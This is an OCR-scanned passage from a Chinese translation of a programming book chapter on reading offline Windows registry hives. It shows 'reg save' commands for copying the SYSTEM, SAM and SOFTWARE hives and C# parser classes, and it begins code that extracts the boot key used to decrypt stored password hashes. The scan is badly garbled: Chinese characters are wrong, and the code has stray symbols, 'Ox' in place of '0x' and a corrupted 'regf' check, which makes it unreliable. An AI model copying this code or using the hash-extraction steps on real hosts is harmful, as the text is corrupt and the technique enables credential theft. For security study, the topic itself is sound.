如 图 14-1 所 示 ， 在 注册 表 头 部 之 后 ， 节 点 树 从 根 节点 键 开 始 。 根 节点 键 有 两 个 子 节 点 ， 在 本 例 中 我 们 称 其 
为 “Foo” 和 “Bar”。“Foo” 节 点 键 包 括 两 个 值 键 即 “Baz” 和 “Bat”， 两 个 的 值 分 别 为 “true” 和 “AHA”。 另 一 边 
的 “Bar” 节 点 键 只 有 一 个 子 节点 “BarBuzz”， 该 子 节点 有 一 个 单独 的 值 键 。 这 个 注册 表 项 树 的 例子 是 刻意 构造 的 ， 而 且 非 常 
简单 ; 你 机 器 上 的 注册 表 项 会 更 加 复杂 ， 可 能 有 成 干 上 万 个 键 ! 


14.2 ”获取 注册 表 项 


在 正常 操作 期 间 ，Windows 系 统 为 了 防止 算 改 会 锁 住 注 册 表 项 。 修 改 Windows 系 统 的 注册 表 可 能 会 造成 灾难 性 的 后 果 ， 比 
如 计算 机 无 法 引导 启动 ， 因 此 它 并 不 是 个 可 以 随意 授 弄 的 东西 。 然 而 ， 如 果 对 主机 有 管理 员 访 问 权限 的 话 ， 你 可 以 使 用 cmd.exe 
控制 台 程 序 导出 一 个 给 定 的 注册 表 。Windows 系 统 自 带 的 reg.exe 工 具 是 一 款 非 常 有 用 的 命令 行 工 具 ， 它 能 够 用 来 读 写 注 册 表 。 
利用 这 球 工 具 来 复制 感 兴趣 的 表 项 ， 残 可 以 脱 机 对 其 进行 读 取 ， 如 清单 14-1 所 示 。 这 样 可 以 避免 友 生 意外 灾难 。 


清单 14-1: 使 用 reg.exe 工 具 复 制 一 个 注册 表 项 


Microsoft Windows [Version 6.1.7601| 

Copyright (c) 2009 Microsoft Corporation. All rights reserved. 
C:\Windows\system32>reg @save HKLM\System C:\system.hive 

The operation completed successfully. 


利用 “save” 子 命令 四 ， 我 们 指定 想 要 保 仔 的 注册 表 路 径 以 及 仓 入 的 文件 。 第 一 个 参数 是 “HKLMNsystem” ， 该 路径 是 对 
应 系统 注册 表 项 的 注册 表 根 节点 ( 即 诸如 局 动 密 钥 之 类 的 信息 所 存放 的 位 置 ) 。 通 过 选择 这 个 注册 表 路 径 ， 我 们 从 主机 上 保存 了 
一 份 系统 注册 表 项 的 副本 以 便 后 续 进一步 分 析 。 对 “HKLM\Sam” 路 径 (用 户 名 和 散 列 值 的 存储 位 置 ) 
和 “HKLM\Software” 路 径 (补丁 级 别 和 其 他 软件 信息 的 存储 位 置 ) 同样 可 以 使 用 该 技术 。 但 是 要 记 住 ,保存 这 些 节 后 需 要 管 
理 员 访问 权限 ! 


如 果 你 拥有 一 块 能 够 挂 载 到 本 地 主机 上 的 硬盘 ， 那 么 还 有 一 种 获取 注册 表 项 的 方法 : 你 可 以 简单 地 从 System32 文 件 夹 中 复 
制 注册 表 项 ， 该 文件 夹 束 是 操作 系统 存放 原始 表 项 的 位 置 。 如 果 Windows 系 统 当前 未 运行 ， 那 么 表 项 不 会 被 鳞 住 ， 因 而 你 可 以 
将 其 复制 到 另 一 个 系统 上 。 你 可 以 在 “C:\Windows\System32\config” 目 录 中 找到 操作 系统 当前 所 用 的 原始 表 项 ( 详 见 清 
14-2) 。 


清单 14-2: 存放 注册 表 项 的 “C:\Windows\system32\config” 文 件 夹 内 容 


Microsoft Windows [Version 6.1.7601| 

Copyright (c) 2009 Microsoft Corporation. All rights reserved. 
C:\Windows\system32>cd config 

C:\Windows\System32\config>dir 

Volume in drive C is BOOTCAMP 

Volume Serial Number is B299-CCD5 

Directory of C:\Windows\System32\config 

01/24/2016 02:17 PM <DIR> 

01/24/2016 02:17 PM <DIR> oe. 

05/23/2014 03:19 AM 28,672 BCD-Template 


01/24/2016 02:24 PM 60,555,264 COMPONENTS 
01/24/2016 02:24 PM 4,456,448 DEFAULT 
07/13/2009 08:34 PM <DIR> Journal 
09/21/2015 05:56 PM 42,909,696 prl boot 
01/19/2016 12:17 AM <DIR> RegBack 
01/24/2016 02:13 PM 262,144 SAM 
01/24/2016 02:24 PM 262,144 SECURITY @ 
01/24/2016 02:36 PM 115,867,648 SOFTWARE @ 
01/24/2016 02:33 PM 15,728,640 SYSTEM ®@ 
06/22/2014 06:13 PM <DIR> systemprofile 
05/24/2014 10:45 AM <DIR> TxR 


8 File(s) 240,070,656 bytes 
6 Dir(s) 332,737,015,808 bytes free 
C:\Windows\System32\config> 


清单 14-2 显 示 了 目录 中 的 注册 表 项 ; “SECURITY”Q@“SOFTWARE”Q@ 和 “SYSTEM”@ 表 项 都 包含 了 一 般 来 说 最 需 
的 信息 。 在 将 表 项 复制 到 本 地 系统 之 后 ， 如 果 你 用 的 是 Linux 或 OS X 系 统 ， 那 么 通过 “file” 命 令 ， 你 可 以 很 容易 地 来 验证 保存 


的 是 否 为 想 要 读 取 的 注册 表 项 (如 清单 14-3 所 示 ) 。 
清单 14-3: 在 Linux 或 OS X 系 统 上 确认 你 所 保存 的 注册 表 项 


$ file system.hive 
system.hive: MS Windows registry file, NT/2000 or above 


$ 


现在 我 们 准备 完毕 ， 可 以 开始 对 一 个 表 项 进行 深入 分 析 了 。 


14.3 ” 读 取 注册 表 项 


我 们 将 从 读 取 注册 表 项 头 部 ( 即 注册 表 项 起 始 处 的 一 个 4096 字 节 大 小 的 数据 块 ) 开始 。 别 担心 ， 实 际 上 只 有 开头 大 约 20 字 
蕊 对 于 格式 解析 有 帮助 ， 而 我 们 将 只 读 取 开 头 4 字 节 来 确认 该 文件 是 注册 表 项 ， 剩 下 的 4000 多 个 字 节 仅 仪 保 仓 到 缓冲 区 中 而 不 进 
行 处 理 。 


14.3.1 ”创建 注册 表 项 文件 的 解析 类 


我 们 将 为 开始 解析 文件 创建 一 个 新 类 ， 即 RegistryHive 类 ; 它 只 有 一 个 构造 器 和 一 些 属性 ， 是 我 们 为 了 读 取 脱 机 的 注册 表 项 
而 实现 的 各 干 个 简单 类 之 一 (如 清单 14-4 所 示 ) 。 


清单 14-4: RegistryHive 类 


public class RegistryHive 
public @RegistryHive(string file) 


if (1@File.Exists(file)) 
throw new FileNotFoundException(); 


this.Filepath = file; 
using (FileStream stream = ©@File.OpenRead(file)) 
using (BinaryReader reader = new @BinaryReader(stream)) 
byte[] buf = reader.ReadBytes(4); 


if @(buf[0] != 'T || buf[1] != 'e' || buf[2] != gg || buf[3] != 'f'") 
throw new NotSupportedException("File not a registry hive."); 


//fast-forward 
@reader.BaseStream.Position = 4096 + 32 + 4; 


this.RootKey = new @NodeKey(reader); 
} 
} 
} 


public string Filepath { get; set; } 
public NodeKey RootKey { get; set; } 
public bool WasExported { get; set; } 


} 


让 我 们 首先 看 一 下 构造 器 ， 这 里 是 奇迹 开始 友和 后 的 地 万 。 构 造 器 Q@ 需 要 一 个 参数 ， 即 文件 系统 中 脱 机 注册 表 项 的 文件 路 径 。 
我 们 使 用 File.Exists () 万 法 @ 检 查 路 径 是 否 存 企 ， 若 路 径 不 存储， 则 抛 出 一 个 异 弟 。 


在 确定 该 文件 存在 之 后 ， 我 们 需要 确保 它 是 一 个 注册 表 文 件 ;而 这 并 不 困难 ， 因 为 任何 注册 表 项 的 开头 四 个 麻木 字 节 应 该 
"rm “e”“g” 和 “f”。 要 检查 该 文件 是 否 匹 配 ， 我 们 使 用 File.OpenRead () 方法 @ 来 打开 一 个 流 对 文件 进行 读 取 ， 然 后 
通过 将 文件 流传 递 给 BinaryReader 类 构造 器 来 创建 一 个 新 的 BinaryReader 对 象 @; 我 们 使 用 该 对 象 来 读 取 文件 的 开头 四 个 字 
三 ， 并 将 其 保存 到 一 个 字 节 数组 中 ; 之 后 ， 我 们 检查 它们 是 否 匹 配 @@。 如 果 不 匹 配 ， 将 抛 出 一 个 异 弟 : 表 项 被 严重 损坏 以 致 无 法 
单 读 取 ， 或 者 它 根本 融 不 是 一 个 表 项 文件 ! 


i 


HH 


在 检验 出 头 部 之 后 ， 我 们 快 进 @ 到 注册 表 头 部 区 块 的 结尾 ， 将 当前 位 置 定位 到 根 书 点 键 ( 跳 过 了 一 些 我 们 当前 不 需要 的 元 数 
据 ) 。 下 一 节 将 创建 一 个 NodeKkey 类 来 处 理 节 点 键 ， 从 而 能 够 通过 将 BinaryReader 对 象 传递 给 NodeKey 类 构造 器 (D 来 读 取 键 ， 
同时 使 用 新 的 NodeKey 对 象 为 RootKey 属 性 赋值 以 备 后 用 。 


14.3.2 创建 节点 键 类 


NodeKey 类 是 我 们 需要 为 读 取 脱 机 注册 表 项 而 实现 的 最 复杂 的 类 。 有 一 些 存储 于 注册 表 项 文件 的 节操 键 元 数据 可 以 跳 过 ， 


但 是 还 有 大 量 的 此 类 数据 我 们 需要 进行 处 理 。 然 而 ，NodeKey 类 的 构造 器 非常 简单 ， 同 时 它 还 有 很 多 属性 (如 清单 14-5 所 


不 ) 。 


定 部 分 ， 


出 


清单 14-5: NodeKey 类 的 构造 器 和 属性 


public class Nodekey 


{ 


public @NodeKey(BinaryReader hive) 


ReadNodeStructure(hive); 
ReadChildrenNodes (hive); 
ReadChildValues (hive); 


} 


public 
public 
public 
public 
public 
public 
public 
public 
public 
public 
public 
public 
public 
public 
public 
public 


List<NodeKey> @ChildNodes { get; set; } 
List<Valuekey> @ChildValues { get; set; } 
DateTime @Timestamp { get; set; } 

int ParentOffset { get; set; } 

int SubkeysCount { get; set; } 

int LFRecordOoffset { get; set; } 

int ClassnameOffset { get; set; } 

int SecurityKeyOffset { get; set; } 

int ValuesCount { get; set; } 

int ValueListOffset { get; set; } 

short NameLength { get; set; } 

bool IsRootKey { get; set; } 

short ClassnameLength { get; set; } 
string Name { get; set; } 

byte[ | ClassnameData { get; set; } 
NodeKey ParentNodekKey { get; set; } 


NodeKey 类 构造 器 @ 需 要 一 个 参数 ， 即 对 应 于 注册 表 项 的 BinaryReader 对 象 。 构 造 器 调用 了 三 个 方法 来 读 取 解 析 节 点 的 指 


随后 我 们 将 实现 这 些 方法 。 在 构造 器 之 后 ， 我 们 定义 了 一 些 将 在 接 下 来 的 三 个 方法 中 使 用 的 属性 ; 其 中 前 三 个 属性 特别 


要 ,分 别 是 “ChildNodes” 属 性 @) “ChildValues” 属 性 @ 和 “Timestamp” 属 性 @。 


在 NodeKey 类 构造 器 中 调用 的 第 一 个 万 法 是 ReadNodeStructrue () ， 访 方法 用 于 从 注册 表 项 中 读 取 市 点 键 的 数据 ， 但 是 


其 中 不 包括 其 子 节操 或 值 。 具 体 代码 详 见 清 单 14-6。 


清单 14-6: NodeKey 类 中 的 ReadNodeStructrue () 方法 


private void ReadNodeStructure(BinaryReader hive) 


byte[] buf = hive.@ReadBytes(4); 


if (buf[0] != 0x6e || buf[1] != 0x6b) //nk 
throw new NotSupportedException("Bad nk header"); 


long startingoffset = @hive.BaseStream.Position; 
this.@IsRootKey = (buf[2] == Ox2c) ? true : false; 
this.@Timestamp = DateTime.FromFileTime(hive.ReadInt64()); 


hive.BaseStream.Position += ©@4; //skip metadata 


this.ParentOffset = hive.@ReadInt32(); 
this.SubkeysCount = hive.ReadInt32(); 


hive.BaseStream.Position += 4; //skip metadata 
this.LFRecordOffset = hive.ReadInt32(); 


hive.BaseStream.Position += 4; //skip metadata 


this.ValuesCount = hive.ReadInt32(); 
this.ValueListOffset = hive.ReadInt32(); 
this.SecurityKeyOffset = hive.ReadInt32(); 
this.ClassnameOffset = hive.ReadInt32(); 


hive.BaseStream.Position = startingOffset + 68; 


this.NameLength = hive.@ReadInt16(); 
this.ClassnameLength = hive.ReadInt16(); 


buf = hive.@ReadBytes(this.NameLength); 

this.Name = System.Text.Encoding.UTF8.GetString(buf); 
hive.BaseStream.Position = this.ClassnameOffset + 4 + 4096; 
this.®@ClassnameData = hive.ReadBytes(this.ClassnameLength); 


在 ReadNodestructrue () 万 法 的 开头 ,我 们 百 先 使 用 ReadBytes () 万 法 @ 读 取 节 氮 键 的 随后 4 个 字 节 ， 来 检查 我 们 是 售 
处 于 一 个 节操 键 的 起 始 处 (要 注意 的 是 ， 后 两 个 字 忆 对 我 们 来 说 是 可 以 忽略 的 无 用 信息 ; 我 们 只 关注 前 两 个 字 忆 ) 。 将 这 些 字 贡 
的 前 两 个 分 别 与 值 0x6e 和 0x6b 相 比较 ;我们 所 查找 的 这 两 个 十 六 进 制 字 书 数值 代表 了 ASCII 码 字符 “n” 和 “k” ( 即 节操 键 的 
简写 ) 。 注 册 表 项 中 的 每 一 个 节操 键 起 始 处 都 有 这 两 个 字 忆 ， 因 此 我 们 可 以 始终 确信 正在 解析 预期 的 内 容 。 在 确认 正在 读 取 一 个 
证 点 键 之 后 ， 我 们 保存 文件 流 中 的 当前 位 置 @， 以 便 随时 能 够 返回 此 处 。 


接 下 来 ， 我 们 开始 为 NodeKey 类 中 的 属性 赋值 ， 首 先是 “lsRootKey” 属 性 @@ 和 “Timestamp” 属 性 @)。 需 要 注意 的 是 ， 
每 隔 几 行 我 们 就 将 当前 流 位 置 步 进 4 个 字 节 而 不 读 取 任何 内 容 ; 跳 过 的 是 对 我 们 来 说 不 需要 的 元 数据 片段 。 


之 后 ， 使 用 Readlnt32 () 方法 @ 来 读 取 4 个 字 节 ， 并 返回 一 个 整 型 数值 来 代表 C# 语 言 能 够 读 取 的 内 容 。 这 残 是 
BinaryReader 类 如 此 有 用 的 原因 ; 它 有 很 多 能 够 很 方便 地 为 你 提取 字 节 的 方法 。 如 你 所 见 ， 大 部 分 情况 下 我 们 用 的 是 
Readlnt32 () 方法 ,但 有 时 为 了 读 取 特定 类 型 的 整 型 数据 (比如 无 得 号 和 长 整 型 数据 ) ， 我 们 也 会 用 到 Readlnt16 () 方法 @ 
或 其 他 万 法 。 


最 后 ， 我 们 读 取 NodeKkey 类 的 名 字 @， 并 用 得 到 的 字符 串 为 “Name” 属性 赋值 。 我 们 还 会 读 取 类 名 称 数 据 @@， 这 些 数据 


将 人 在 后 续 导 出 局 动 密 钥 的 过 程 中 用 到 。 


现在 我 们 需要 实现 ReadChildrenNodes () 方法 ， 该 方法 用 于 迭代 处 理 每 个 子 节 点 ， 并 将 节 氮 添加 到 “ChildNodes” 属性 
中 以 备 后 续 分 析 (如 清单 14-7 所 示 ) 。 


清单 14-7: NodeKey 类 中 的 ReadChildrenNodes () 方法 


private void ReadChildrenNodes(@BinaryReader hive) 


this.ChildNodes = new @List<NodeKey>(); 
if (this.LFRecordOffset != -1) 


| 


hive.BaseStream.Position = 4096 + this.LFRecordOffset + 4; 
byte[] buf = hive.ReadBytes(2); 


a 
if @(buf[0| == Ox72 && buf[1] == Ox69) 
{ 


int count = hive.ReadInt16(); 
@for (int i = 0; i «< count; i++) 


{ 


long pos = hive.BaseStream.Position; 

int offset = hive.ReadInt32(); 
@hive.BaseStream.Position = 4096 + offset + 4; 

buf = hive.ReadBytes(2); 


if (!(buf[0] == Ox6c && (buf[1] == Ox66 || buf[1] == Ox68))) 
throw new Exception("Bad LF/LH record at:" 
+ hive.BaseStream.Position); 


@ParseChildNodes (hive); 


@hive.BaseStream.Position = pos + 4; //go to next record list 


} 


/11 or Ih 
else if @(buf[0|] == Ox6c && (buf[1|] == Ox66 || buf[1] == Ox68)) 
ParseChildNodes (hive); 
else 
throw new Exception("Bad LF/LH/RI record at: " 
+ hive.BaseStream.Position); 


束 像 我 们 为 NodeKey 类 所 实现 的 大 部 分 方法 一 样 ，ReadChildrenNodes () 万 法 需要 一 个 参数 ， 即 对 应 于 注册 表 项 的 
BinaryReader 对 象 @。 我 们 为 要 读 入 的 “ChildNodes” 属 性 创建 一 个 空 的 节点 键 列表 @， 然 后 必须 解析 当前 节点 键 中 的 每 一 个 
子 节点 ; 这 有 一 点 复杂 ， 因 为 指向 子 节点 键 一 共有 三 种 不 同 的 方式 ， 而 其 中 一 种 类 型 需要 用 和 其 他 两 种 不 同 的 方式 进行 读 取 。 这 
三 种 类 型 分 别 是 “ri” (索引 根 ) “lf” (快速 叶 ) 和 “lh” ( 散 列 叶 ) 结构 。 


首先 检查 正在 处 理 的 是 否 为 一 个 “ri” 结 构 @。 “ri” 结 构 是 一 种 容器 ， 它 以 稍微 不 同 的 方式 进行 存储 ;， 它 被 用 于 指向 多 
个 “lf” 或 “lh” 记 录 ， 因 而 相 比 于 单个 “If” 或 “lIh” 记 录 能 够 处 理 的 数量 ， 它 能 够 使 节操 键 拥有 更 多 的 子 节 后。 在 使 用 一 个 
for 循 环 @ 对 每 个 子 节操 集合 进行 循环 处 理 时 ， 我 们 跳 转 到 每 一 个 子 节 点 记录 的 位 置 ， 并 通过 传递 对 应 于 表 项 的 BinaryReader 
对 象 作为 唯一 参数 来 调用 ParseChildNodes () 方法 @ (该 方法 随后 将 会 实现 ) 。 在 对 子 世 点 解析 完毕 之 后 ， 我 们 可 以 看 到 沅 
VvV 置 已 经 改变 (因为 我 们 在 注册 表 项 中 来 回 移动 了 ) ， 因 此 为 了 读 取 列表 中 的 下 一 项 记录 ， 需 要 重新 设置 流 位 置 ， 以 指向 之 前 读 


取 子 项 的 “mi” 列表 @。 


如 果 正 在 处 理 的 是 一 个 “上 或 “h ”记录 @@， 那 么 可 以 直接 将 BinaryReader 对 象 传递 给 ParseChildNodes () 方法 @， 然 
后 让 其 直接 读 取 节 后。 


押运 的 是 ， 在 读 取 子 节点 之 后 ， 无 论 使 用 哪 种 结构 指向 它们 ， 对 其 进行 解析 的 方式 都 相同 。 进 行 所 有 实际 解析 工作 的 方法 相 
对 来 况 比 较 简单 ， 如 清单 14-8 所 示 。 


清单 14-8: NodeKey 类 中 的 ParseChildNodes () 方法 


private void ParseChildNodes(@BinaryReader hive) 
int count = hive.@ReadInt16(); 
long topOfList = hive.BaseStream.Position; 
@for (int i = 0; i «< count; i++) 
{ 
hive.BaseStream.Position = topOfList + (i*8); 
int newoffset = hive.ReadInt32(); 
hive.BaseStream.Position += 4; //skip over registry metadata 
hive.BaseStream.Position = 4096 + newoffset + 4; 
Nodekey nk = new @NodeKey(hive) { ParentNodeKey = this }; 
this.ChildNodes .©@Add(nk); 
} 


hive.BaseStream.Position = topOfList + (count * 8); 


} 


ParseChildNodes () 方法 需要 一 个 参数 ， 即 对 应 于 表 项 的 BinaryReader 对 象 @@。 我 们 将 需要 循环 解析 处 理 的 节点 数目 存 
放 在 一 个 16 位 整 型 数据 中 ， 可 以 从 表 项 中 读 取 @。 在 保存 当前 位 置 以 便 接 下 来 可 以 随时 返回 之 后 ， 我 们 使 用 一 个 for 循 环 @@ 进 行 
迭代 ， 跳 转 到 每 一 个 新 节点 的 位 置 ， 并 将 BinaryReader 对 象 传递 给 NodeKey 类 的 构造 @ 器 。 在 创建 子 节点 的 NodeKey 对 和 象 之 
后 ， 我 们 将 节点 添加 @ 到 ChildNodes 属 性 列表 之 中 ， 并 再 次 重复 该 过 程 直 至 不 再 有 更 多 的 节点 可 被 读 取 。 


NodeKey 类 构造 器 所 调用 的 最 后 一 个 万 法 是 ReadChildValues () 。 该 万 法 (具体 代码 详 见 清单 14-9) 使 用 我 们 在 节操 键 
中 所 找到 的 所 有 键 / 值 对 为 “ChildValues” 属性 赋值 。 


清单 14-9: NodeKey 类 中 的 ReadChildValues () 方法 


private void ReadChildValues(BinaryReader hive) 
{ 
this.ChildValues = new @List<ValueKey>(); 
if (this.ValueListOffset != @-1) 
{ 
@hive.BaseStream.Position = 4096 + this.ValuelListOffset + 4; 
for (int i = 0; i «< this.ValuesCount; i++) 
{ 
hive.BaseStream.Position = 4096 + this.ValueListOffset + 4 + (i*4); 
int offset = hive.ReadInt32(); 
hive.BaseStream.Position = 4096 + offset + 4; 
this.ChildValues.@Add(new ValueKey(hive)); 
} 
J 
} 


在 ReadChildValues () 方法 中 ， 我 们 首先 实例 化 一 个 用 于 存放 ValueKey 对 象 的 新 列表 Q@@， 并 用 它 为 “ChildValues” 属 性 


赋值 。 如 果 “ValueListoOffset” 属性 不 等 于 -1@ (这 是 一 个 特殊 值 ， 代 表 没 有 子 值 ) ， 残 跳 转 到 ValueKey 对 象 询 表 @ 的 位 置 并 
开始 使 用 一 个 for 循 环 依次 读 取 每 一 个 值 键 ， 最 后 将 每 一 个 新 键 添加 @ 到 “ChildValues” 属 性 中 以 备 后 续 访 问 。 


至 此 束 完 成 了 NodeKey 类 的 构建 工作 ; 接 下 来 ， 需 要 实现 的 最 后 一 个 类 是 ValueKey。 


14.3.3 ”创建 信 键 的 仔 情 类 


相 比 于 NodeKey 类 ，ValueKey 类 要 简短 得 多 。 尽 管 ValueKey 类 也 有 很 多 属性 ， 但 它 的 大 部 分 代码 是 其 构造 器 (如 清单 14- 
10 所 示 ) 。 在 完成 实现 剩 下 的 这 些 工作 之 后 ， 我 们 就 可 以 开始 读 取 脱 机 的 注册 表 项 了 。 


清单 14-10: ValueKey 类 


public class Valuekey 


{ 
public @ValueKey(BinaryReader hive) 


byte[] buf = hive.@ReadBytes(2); 


if (buf[0] != 0x76 || buf[1] != Ox6b) //vk 
throw new NotSupportedException("Bad vk header"); 


this.NameLength = hive.®@ReadInt16(); 


this.DataLength = hive.@ReadInt32(); 
byte[] @databuf = hive.ReadBytes(4); 


this.ValueType = hive.ReadInt32(); 
hive.BaseStream.Position += 4; //skip metadata 


buf = hive.ReadBytes(this.NameLength); 
this.Name = (this.NameLength == 0) ? "Default" : 
System.Text.Encoding.UTF8.GetString(buf); 


if (@this.DataLength < 5) 
@this.Data = databuf; 
else 


hive.BaseStream.Position = 4096 + BitConverter.@ToInt32(databuf, 0) + 4; 
this.Data = hive.ReadBytes(this.DataLength); 


public short NameLength { get; set; } 
public int DataLength { get; set; } 
public int Data0ffset { get; set; } 
public int ValueType { get; set; } 
public string Name { get; set; } 
public byte[|] Data { get; set; } 
public string String { get; set; } 


在 构造 器 @@ 中 ， 读 取 @ 头 两 个 字 节 ， 并 像 之 前 的 操作 一 样 ， 通 过 将 两 个 字 忆 与 0Xx76 和 0x6b 进 行 比较 来 确保 正在 读 取 的 是 一 
个 值 键 ; 这 种 情况 等 同 于 得 找 AsCll 字 符 形 式 的 “vk”。 之 后 还 要 读 取 名 称 长 度 @ 和 数据 长 厌 @@， 并 用 这 些 值 为 它们 各 目 对 应 的 
属性 赋值 。 


需要 注意 的 是 ，databuf 变 量 @ 里 保存 的 可 能 是 指 同 值 键 数据 的 指针 ， 也 可 能 是 值 键 数据 本 身 ; 如 果 数 据 长 度 大 于 等 于 5， 
则 变量 中 的 数据 通 弟 融 是 一 个 4 字 世 长度 的 指针 。 使 用 “DataLength” 属 性 @ 来 检查 ValueKey 对 和 象 的 长 度 是 售 小 于 5?: 右 是 ， 
则 直接 使 用 databuf 变 量 中 的 数据 来 为 “Data” 属性 赋值 并 结束 ; 否则 ， 将 databuf 变 量 转 化 为 一 个 32 位 整 型 数值 @®， 该 数值 是 
从 文件 流 中 的 当前 位 置 到 待 读 取 的 实际 数据 的 偏 移 ， 然 后 跳 转 到 偏 移 对 应 的 流 位 置 ， 并 使 用 ReadBytes () 方法 读 取 数 据 ， 最 后 
用 其 为 “Data” 属性 赋值 。 


14.4 对 库 进 行 测试 


完成 编写 上 述 类 之 后 ， 我 们 可 以 编写 一 个 快速 的 Main () 方法 〈 如 清单 14-11 所 示 ) 来 测试 解析 注册 表 项 是 否 成 功 。 
清单 14-11: 用 于 打印 注册 表 项 根 键 名 称 的 Main () 方法 


public static void Main(string[] args ) 


| 
RegistryHive hive = new @RegistryHive(args[0]); 
Console.WriteLine("The rootkey's name is " + hive.RootKey.Name ) ; 


} 


在 Main () 方法 中 ， 通 过 将 程序 的 第 一 个 参数 作为 文件 系统 中 脱 机 的 注册 表 项 文件 路 径 传递 给 RegistryHive 类 构造 器 ， 我 
们 实例 化 一 个 新 的 RegistryHive 类 @@。 然 后 ， 打 印 注册 表 项 根 NodeKey 对 象 的 名 称 ， 设 名 称 存放 人 在 RegistryHive 类 
的 “RootKey” 属 性 中 : 


$ ./ch1i4 reading offline hives.exe /Users/bperry/system.hive 
The rootkey's name is CMI-CreateHive{2A7FB991-7BBE-4F9D-B91E-7CB51D4737F5} 
$ 


在 确认 成 功 解析 表 项 之 后 ， 我 们 束 可 以 准备 搜索 注册 表 ， 查 找 我 们 感 兴趣 的 信息 了 。 


14.5 ”导出 启动 密 钥 


用 户 名 是 很 不 错 的 信息 ， 但 口令 散 列 值 可 能 会 更 有 用 。 因 此 ， 我 们 要 学 习 如 何 找到 这 些 信息 。 为 了 访问 注册 表 中 的 口令 散 列 
值 ， 首 先 必须 从 SYSTEM 表 项 中 获取 启动 密 钥 。Windows 系 统 注册 表 中 的 口令 散 列 值 是 使 用 启动 密 钥 进 行 加 密 的 ， 该 密 钥 对 大 
部 分 Windows 系 统 主机 来 说 是 唯一 的 (除非 是 镜像 或 虚拟 机 副本 ) 。 向 包含 Main () 方法 的 类 中 再 添加 四 个 方法 ， 我 们 就 可 以 
从 SYSTEM 注 册 表 项 中 导出 启动 密 钥 。 


14.5.1 GetBootKey () 方法 


第 一 个 方法 是 GetBootkey () ， 它 以 一 个 注册 表 项 为 参数 ， 并 返回 一 个 字 节 数组 。 局 动 密 钥 被 分 散 放 置 在 注册 表 项 的 多 个 
证 点 键 中 ， 因 此 首先 要 读 取 这 些 证 点 键 ， 然 后 使 用 一 种 特殊 算 冯 进行 解密 ， 这 样 才能 得 到 最 终 的 启动 密 钥 。 访 方法 的 前 半 部 分 如 
清单 14-12 所 示 。 


清单 14-12: 用 于 读 取 置 乱 启动 密 钥 的 GetBootKey () 方法 的 前 半 部 分 


static byte[] GetBootKey(RegistryHive hive) 


ValueKey controlSet = @CetValueKey(hive, "Select\\Default"); 


int cs = BitConverter.ToInt32(controlSet.Data, 0); 


StringBuilder scrambledKey = new StringBuilder(); 
foreach (string key in new string[|] @{"JD", "Skew1", "GBG", "Data"}) 


Nodekey nk = @CGetNodeKey(hive, "ControlSet00" + cs + 
"\\Control\\Lsa\\" + key); 


for (int i = 0; i < nk.ClassnameLength && i < 8; i++) 
scrambledKey.@Append( (char)nk.ClassnameData [i*2|]); 


GetBootKey () 方法 首先 使 用 GetValueKey () 方法 (我 们 很 快 就 会 实现 该 方法 ) 抓 取 ^Select\Default” 值 键 ， 其 中 存 
放 了 注册 表 所 用 的 当前 控制 集 。 我 们 需要 这 些 信息 来 从 正确 的 控制 集中 读 取 正 确 的 启动 密 钥 注册 表 值 。 控 制 集 是 保存 在 注册 表 中 
的 操作 系统 配置 集合 。 出 于 备份 目的 注册 表 中 会 存放 副本 以 防 衣 演 ， 因 此 我 们 需要 找到 引导 启动 过 程 中 默认 选择 的 控制 
集 ; “Select\Default” 注 册 表 值 键 专门 标识 了 这 些 控制 集 。 


在 找到 J 正确 的 默认 控制 集 之 后 ， 我 们 将 对 4 个 值 键 进行 循环 处 理 ， 它 们 分 别 是 “JD”“Skew1” “GBG” 和 “Data”， 其 
中 存放 着 加 密 的 启动 密 钥 数 据 @。 在 迭代 过 程 中 ， 我 们 使 用 GetNodeKey () 方法 @ (马上 会 实现 该 方法 ) 找到 每 个 键 ， 逐 字 节 
地 循环 处 理 局 动 密 钥 数 据 ， 然 后 将 其 附加 @ 到 整个 置 乱 局 动 密 钥 的 后 面 。 


在 获取 置 乱 的 局 动 密 钥 之 后 ， 我 们 需要 将 其 恢复 ， 我 们 可 以 使 用 一 种 简单 直接 的 算法 来 完成 这 个 工作 。 清 单 14-13 显 示 的 是 
我 们 如 何 将 置 乱 的 启动 密 钥 转 化 为 用 于 解密 口令 散 列 值 的 密 钥 。 


清单 14-13: 恢复 启动 密 钥 的 GetBootKey () 方法 的 后 半 部 分 代码 


byte[ |] skey = @StringToByteArray(scrambledKey.ToString()); 
byte[ | descramble = @new byte[ | { Ox8, Ox5, Ox4, Ox2, Oxb, Ox9, Oxd, Ox3, 
Ox0, Ox6, Ox1, Oxc, Oxe, Oxa, Oxf, Ox7 }; 


byte[ | bootkey = new 四 byte[16 | ; 
@for (int i = 0; i «< bootkey.Length; i++) 
bootkey[i] = skey[ @descramblel[i|]; 


return @bootkey; 
} 


在 使 用 StringToByteArray () 方法 @ (马上 要 实现 该 万 法 ) 将 置 乱 密 钥 转 换 为 字 节 数组 以 便 后 续 处 理 之 后 ， 我 们 创建 了 一 
个 新 的 字 节 数 @ 组 来 恢复 当前 值 。 然 后 ,创建 了 另 一 个 新 的 字符 数组 @ 来 存放 最 终结 果 ， 并 使 用 一 个 for 循 环 @ 来 迭代 处 理 置 本 


密 钥 ， 使 用 descramble 字 节 数 组 来 为 最 终 的 bootkey 字 节 数 组 找到 正确 值 。 最 后 ， 我 们 向 调用 方 返 回 最 终 的 密 钥 @)。 


14.5.2 GetValueKey () 方法 


GetValueKey () 万 法 (如 清单 14-14 所 示 ) 简单 地 为 表 项 中 的 一 个 给 定 路 径 返 回 一 个 值 。 


清单 14-14: GetValueKey () 方法 


static ValueKkey GetValueKey(@RegistryHive hive, @string path ) 


{ 
string keyname = path.®@Split('\\').@Last(); 
NodeKey node = @CetNodeKey(hive, path); 
return node.ChildValues.@SingleOrDefault(v => v.Name == keyname); 


} 


这 个 简单 的 方法 需要 一 个 注册 表 项 @ 和 在 表 项 中 查找 的 注册 表 路 径 @ 作 为 参数 。 利 用 注册 表 路 径 中 分 隔世 点 的 有 反 和 斜 村 符号， 
来 划分 路 径 @ 并 选取 路 径 的 最 后 部 @ 分 作为 竺 查找 的 值 键 。 然 后 ， 将 注册 表 项 和 注册 表 路 径 传递 给 GetNodekey () 方法 @ ( 稍 
后 实现 ) ， 该 方法 将 返回 包含 键 的 节点 。 最 后 ， 使 用 语言 集成 查询 (LINQ) 方法 SingleOrDefault () @ 来 从 书 点 的 子 值 中 获取 
返回 值 键 。 


14.5.3 GetNodeKey () 方法 


GetNodeKey () 方法 比 GetValueKey() 方法 要 稍微 复杂 一 点 。 如 清单 14-15 所 示 ，GetNodeKey () 方法 对 一 个 表 项 进 
